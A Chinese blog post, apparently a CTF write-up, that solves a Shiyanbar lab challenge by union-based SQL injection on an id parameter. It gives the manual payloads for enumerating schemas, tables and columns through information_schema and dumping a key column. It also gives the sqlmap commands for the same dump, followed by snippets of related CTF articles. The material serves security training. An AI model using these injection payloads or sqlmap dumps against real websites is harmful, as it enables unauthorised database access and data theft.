CTF 这个看起来有点简单

最新推荐文章于 2025-06-29 20:46:46 发布
原创 最新推荐文章于 2025-06-29 20:46:46 发布 · 4.3k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一个简单的SQL注入案例,通过手工注入方式展示了如何利用SQL注入获取数据库信息,并给出了使用sqlmap工具进行自动化注入攻击的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这个看起来有点简单分值:10

  • 来源: 西普学院
  • 难度:易

很明显。过年过节不送礼,送礼就送这个

格式:

解题链接: http://ctf5.shiyanbar.com/8/index.php?id=1


解法:

1.手工注入

 

id=1'

id=1 and 1=1

id=1 and 1=2                          判断是sql注入

id=1 order by 2                       两个字节

id=1 union select 1,2               回显2

爆数据库:

 and 1=2 union select 1,schema_name  from information_schema.schemata limit 0,2

                 information_schema     my_db

爆表:

and 1=2 union select 1,table_name from information_schema.tables where table_schema=0x6d795f6462 limit 0,2

                           news           thiskey

爆字段:

and 1=2 union select 1,column_name from information_schema.columns where table_schema=0x6d795f6462 limit 0,3

                                id        content           k0y

爆内容:

and 1=2 union select 1,k0y from thiskey

key=>           whati0MyD9ldump

sqlmap解法:

列 数据库:

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --dbs


列表:

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables


列字段:

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns
这个跑不出来。直接用下面的可以,但是需要知道k0y。

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump


得出结果,但是需要把1改为l,不知道为什么。




CTF-web-貌似有点难
zhz444614971的博客
04-01 429
CTF-web 0x01:貌似有点难 题目链接:http://ctf5.shiyanbar.com/phpaudit/ python代码: import requests s=requests.Session() url='http://ctf5.shiyanbar.com/phpaudit/' headers={ # 'X_FORWARDED-FOR':'1.1.1.1', 'Con...
实验吧ctf题库:这个看起来有点简单
qq_30990005的博客
06-17 6569
       查看这道题先登陆“实验吧”,地址为 http://www.shiyanbar.com/ctf/33 。       这是一道十分基础的web题目,因为我也是刚刚接触ctf,记录一下第一道题的解题过程,算是自己的一个回顾吧,同时也给一些想要入门的朋友一点点微弱的参考吧。一、sqlmap的安装       在windows下安装sqlmap需要先下载适用windows的sqlmap版本和...
ctf比赛的三种形式
qq_33881738的博客
03-10 1万+
竞赛模式编辑 CTF竞赛模式具体分为以下三类: 一、解题模式(Jeopardy) 在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏洞挖掘与利用、Web渗透、密码、取证、隐写、安全编程等类别。 二、攻防模式(Attack-Defense) 在...
BUUCTF--世上无难事
最新发布
2302_82163917的博客
06-29 393
本题中,后半部分密钥的加密本质是前半部分替换规则的延续应用,体现了密码学中 "一致性" 的设计原则。实际应用中,此类密码的安全性依赖于替换表的复杂度,但仍可通过频率分析和计算机辅助破解,因此现代密码学更多采用复杂的多表替换或对称加密算法。前半部分可能为单表替换加密的英文语句,需通过密码分析确定替换规则。替换后的字符串满足 32 位小写字母要求,且通过工具破解流程验证了替换规则的合理性。该工具通过统计字母频率和英文语法规则,推测密文字母与明文字母的对应关系。
CTF模式
haoshangguan的博客
10-12 1674
CTF竞赛模式具体分为以下几类: 正文 理论知识 理论题多见于国内比赛,通常为选择题。包含单选及多选,选手需要根据自己所学的相关理论知识进行作答。最终得出分数。理论部分通常多见于初赛或是初赛之前的海选 Jeopardy-解题 参赛队伍可以通过互联网或者现场网络参与,参数队伍通过与在线环境交互或文件离线分析,解决网络安全技术挑战获取相应分值,类似于 ACM 编程竞赛、信息学奥林匹克赛,根据总分和时间来进行排名。 不同的是这个解题模式一般会设置 一血(First Blood) 、 二血(Second Blood
ctf
anzhuangguai的专栏
03-28 402
http://blog.csdn.net/qq_29343201/article/details/51337025
CTF
煮酒闲谈
10-18 6143
摘要CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。 其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。 为了方便称呼,我们把这样的内容称之为“Flag”。 CTF对于我们的意义1CTF类似于奥数2:能力提升思维能力 快速学习能力 技术能力
实验吧ctf-web题:这个看起来有点简单
Elvira
08-22 7593
sql注入,sqlmap,union,information_schema
CTF练习(3)-这个看起来有点简单!(SQL注入)
qq_35097943的博客
03-19 524
一、打开题目链接 题目链接:http://www.shiyanbar.com/ctf/33 看到一个表格,很容易联想到数据库,不过还是从源码看起 源码中是一个简单的table表格,看到代码中含有’1’,那么再看URl:http://ctf5.shiyanbar.com/8/index.php?id=1id = 1? 可以分析出这可能是一个SQL注入点。 SQL注入:就是前端通过提...
一套简单ctf_web源码环境.zip
10-02
【标题】:“一套简单ctf_web源码环境.zip”揭示了这是一个包含CTF(Capture The Flag)网络安全竞赛中Web挑战的源代码环境。CTF比赛是网络安全领域的一种学习和竞技方式,参与者通过解决各种安全问题来获取“旗标...
CTF指南--隐写术总结(非常详细)从零基础入门到精通,看完这一篇就够了_ctf 图片隐写光学成像
2401_86044342的博客
08-27 2318
binwalkBinwalk是一个固件的分析工具,多用于逆向工程、取证、隐写分析。更多…$ binwalk firmware.bin //最简单的操作$ binwalk --enable-plugin=zlib firmware.bin //有些签名无法识别,利用zlib插件扫描zlib压缩包可识别$ binwalk -y filesystem firmware.bin //指定字符串“filesystem”搜索(正则),-Y 输出结果只包含文本字符串。
CTF学习规划————1、如何入门CTF
热门推荐
Fly_鹏程万里
05-16 15万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! CTF简介 CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DE...
逆向攻防世界CTF系列25-EasyRE
LH1013886337的博客
11-11 364
先做了一个反转,然后做一个 -1 然后^ 6。32位无壳,ida看main,简单异或。上面那个flag迷惑人用的。
一、什么是CTFCTF,即 Capture The Flag,中文名为夺旗赛,是一种网络安全技术人员之间进行技术竞技的比赛形式。 在 CTF 比赛中,参赛者需要通过解决各种与网络安全相关的技术挑
QIANDXX的博客
02-06 1140
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
BUUCTF easyre
chneft的博客
10-02 2792
IDA分为32位和64位,32位版本用来打开32位软件,64位用来打开64位软件(具体为什么不太清楚,可能是因为32位和64位对应的寄存器有所改变吧)看到一个文件首先得知道它有没有壳,所谓加壳就是改变该程序的入口,使cs:ip指向另外一段代码,执行完额外的代码后再回到程序本来的入口,这样反编译软件就不能轻易进行反编译。’右边的注释显示了貌似是真的flag,为了知其所以然,我不直接将它视为答案,双击aFlagThisIsAEas,看看这个变量对应的内存空间到底存放了什么。
buuctf easyRE
weixin_45701079的博客
10-18 1158
buuctf easyRE[2019红帽杯] 简单总结一下,一般说是easy的都不简单 加载ida查看字符串,找到主要函数, 第一组数据解出 Info:The first four chars are flag 然后看下面,打开函数发现是base64加密,加密十次,然后比较,把字符串解密十次,发现给了一个网址(不好意思,网址给关了,不想再解密10次了,就口头描述一下),打开网址,发现是… 然后看大佬博客,才知道是个迷惑我们的函数,真正的核心函数在上图所示函数的下一个(wdnmd)口吐芬芳 然后利用”f
CTF--reverse静态,easyre解题
2301_79612114的博客
03-19 334
reverse
实验吧ctf-web-貌似有点难
n0l的博客
04-02 537
貌似有点难 http://ctf5.shiyanbar.com/phpaudit/ 首先,打开链接 如图,提示view the source code, 那就打开看看呗: 查看代码 通过代码可以发现,后端调用一个名为GetIP的函数,按顺序检查"HTTP_CLIENT_IP","HTTP_X_FORWARDED_FOR"和"REMOTE_ADDR"这三个地址,如果其中有一个不为空,那么将...
这是一道ctf题目
06-19
<think>我们有一个CTF题目中的字符串:f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA8ARAAAAAAABAAAAAAAAAAJA/AAAAAAAAAAAAAEAAOAAJAEAAHgAdAAYAAAAEAAAAQ...(省略部分)根据之前的引用,特别是引用[3]中提到的解密过程,我们可以推测这可能是一个二进制文件(因为开头是"f0VMRgIBA",这看起来像ELF文件的魔数)。但是,用户给出的字符串是Base64编码的吗?还是直接是二进制数据?观察字符串:它以"f0VMRgIBA"开头,这类似于ELF文件头的Base64编码。因为ELF文件头通常以"\x7fELF"开始,我们将其转换为Base64:"\x7f"的ASCII码是127,在Base64编码表中,127对应的字符并不是直接可读的,但我们可以尝试将整个字符串进行Base64解码。步骤:1.将给定的字符串(Base64编码)解码为二进制数据。2.将二进制数据保存为文件,然后分析文件类型。但是,用户给出的字符串很长,而且中间有省略号。我们无法处理省略的部分,所以只能假设这是一个完整的Base64字符串。然而,引用[3]中提到的解密过程是一个自定义的算法,但用户提供的字符串看起来像Base64编码的二进制文件,所以可能不需要引用[3]的算法。另外,引用[1]中提到了八进制数字字符串转换为ASCII字符的方法,但这里不是八进制数字字符串,而是Base64字符串。所以,我们尝试Base64解码。由于字符串很长,我们可以写一个简单的程序来解码并保存为文件,然后使用工具分析(如file命令、strings命令等)。但在这里,我们只能进行Base64解码,然后查看文件头确认。注意:在Python中,我们可以用base64模块进行解码。示例代码:importbase64encoded_str="f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA8ARAAAAAAABAAAAAAAAAAJA/AAAAAAAAAAAAAEAAOAAJAEAAHgAdAAYAAAAEAAAAQ..."#这里需要完整的字符串decoded_data=base64.b64decode(encoded_str)withopen('output','wb')asf:f.write(decoded_data)然后,我们可以用命令行工具检查文件类型:fileoutput如果文件是ELF可执行文件,那么我们可以尝试运行它(在安全环境下)或者用逆向工程工具(如IDA、Ghidra)分析。但是,用户没有提供完整的字符串,所以我们无法实际执行。因此,我们只能提供方法。另外,如果题目有额外的加密或混淆,可能需要进一步分析。但根据字符串开头,很大可能是ELF文件。因此,回答如下:</think>要解码或分析CTF题目中的字符串 `f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA8ARAAAAAAABAAAAAAAAAAJA/AAAAAAAAAAAAAEAAOAAJAEAAHgAdAAYAAAAEAAAAQ...`,请按以下步骤操作: ### 🔍 解码步骤分析 1. **识别文件类型** - 字符串开头 `f0VMRgIBA` 是 **ELF可执行文件头的Base64编码**(对应魔数 `\x7fELF`)。 - 使用Base64解码还原原始二进制文件: ```python import base64 encoded_str = "f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA8ARAAAAAAABAAAAAAAAAAJA/AAAAAAAAAAAAAEAAOAAJAEAAHgAdAAYAAAAEAAAAQ..." # 替换为完整字符串 decoded_data = base64.b64decode(encoded_str) with open("output.elf", "wb") as f: f.write(decoded_data) ``` 2. **分析ELF文件** - 通过工具检查文件属性: ```bash file output.elf # 查看文件类型(如ELF 32/64位) strings output.elf # 提取文件中的可读字符串 objdump -d output.elf # 反汇编查看汇编代码 ``` - 若文件包含加密逻辑(如引用[3]中的自定义解密流程),需用逆向工具(Ghidra/IDA)分析关键函数。 3. **处理加密逻辑** - 若发现类似引用[3]的异或加密(`flag += chr(ord(b[i]) ^ ord(tag[i % 6]))`),需定位密钥(如`tag = 'redctf'`)和密文数据段。 - 示例解密片段: ```python tag = 'redctf' # 或根据上下文调整密钥 encrypted_data = [...] # 从文件中提取的密文字节 flag = ''.join(chr(encrypted_data[i] ^ ord(tag[i % len(tag)])) for i in range(len(encrypted_data))) ``` ### ⚠️ 注意事项 - **动态调试**:若文件可执行,使用 `gdb` 或 `strace` 跟踪运行时行为(如输入/输出、系统调用)。 - **隐写可能性**:检查文件是否隐藏额外数据(如通过 `binwalk` 分析)。 - **环境差异**:密钥或算法可能依赖运行环境(如引用[3]中密钥随环境变化)[^3]。 ### 📝 相关问题 1. Base64解码后文件不是ELF格式怎么办? 2. 如何快速定位ELF文件中的加密函数? 3. 遇到非标准加密算法(如自定义位操作)如何逆向分析? > 引用说明:ELF文件头特征分析参考标准文件格式文档[^1],异或解密方法借鉴了CTF逆向题的常见模式[^3]。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

樱缘之梦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值